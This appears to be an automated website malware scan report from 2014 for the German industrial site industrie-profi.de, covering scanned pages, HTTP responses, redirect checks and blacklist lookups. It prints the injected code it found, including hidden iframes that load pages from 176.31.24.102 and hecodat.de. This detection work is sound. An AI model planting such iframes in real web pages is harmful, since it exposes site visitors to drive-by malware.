Scanned pages/files
Request | Server response | Status |
http://industrie-profi.de/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Sep 2014 17:49:29 GMT Location: http://www.industrie-profi.de Server: Apache/2.2.17 (Linux/SUSE) Content-Length: 325 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.industrie-profi.de/ | 200 OK Content-Length: 3208 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[3324 bytes skipped]... Qualitätskontrolle nicht fehlen.</p><!--#--> </div> <div id="navi"> <ul id="intern"> <li><a href="hartfraesen.html">Hartfräsen</a></li> </ul> </div> <div id="footer"> </div> </div> <iframe name=Twitter scrolling=auto frameborder=no align=center height=67 width=46 src=http://176.31.24.102/post.php?id=833047></iframe></body> </html> Malicious iFrame found. size: 46x67 src: http://176.31.24.102/post.php?id=833047 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=67 width=46 src=http://176.31.24.102/post.php?id=833047> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://industrie-profi.de/js/box.js | 200 OK Content-Length: 566 Content-Type: text/x-js | suspicious |
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1508699 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1508699> | ||
http://industrie-profi.de/test404page.js | 200 OK Content-Length: 3204 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[3320 bytes skipped]... Qualitätskontrolle nicht fehlen.</p><!--#--> </div> <div id="navi"> <ul id="intern"> <li><a href="hartfraesen.html">Hartfräsen</a></li> </ul> </div> <div id="footer"> </div> </div> <iframe name=Twitter scrolling=auto frameborder=no align=center height=67 width=46 src=http://176.31.24.102/post.php?id=833047></iframe></body> </html> Malicious iFrame found. size: 46x67 src: http://176.31.24.102/post.php?id=833047 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=67 width=46 src=http://176.31.24.102/post.php?id=833047> | ||
http://industrie-profi.de/js/fancybox/jquery.fancybox-1.3.1.pack.js | 200 OK Content-Length: 14886 Content-Type: text/x-js | suspicious |
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1508699 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1508699> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: industrie-profi.de
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 17:49:29 GMT
Location: http://www.industrie-profi.de
Server: Apache/2.2.17 (Linux/SUSE)
Content-Length: 325
Content-Type: text/html; charset=iso-8859-1
...325 bytes of data.
GET / HTTP/1.1
Host: industrie-profi.de
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 17:49:29 GMT
Location: http://www.industrie-profi.de
Server: Apache/2.2.17 (Linux/SUSE)
Content-Length: 325
Content-Type: text/html; charset=iso-8859-1
...325 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: industrie-profi.de
Referer: http://www.google.com/search?q=industrie-profi.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: industrie-profi.de
Referer: http://www.google.com/search?q=industrie-profi.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=industrie-profi.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://industrie-profi.de/
Result: industrie-profi.de is not infected or malware details are not published yet.
Result: industrie-profi.de is not infected or malware details are not published yet.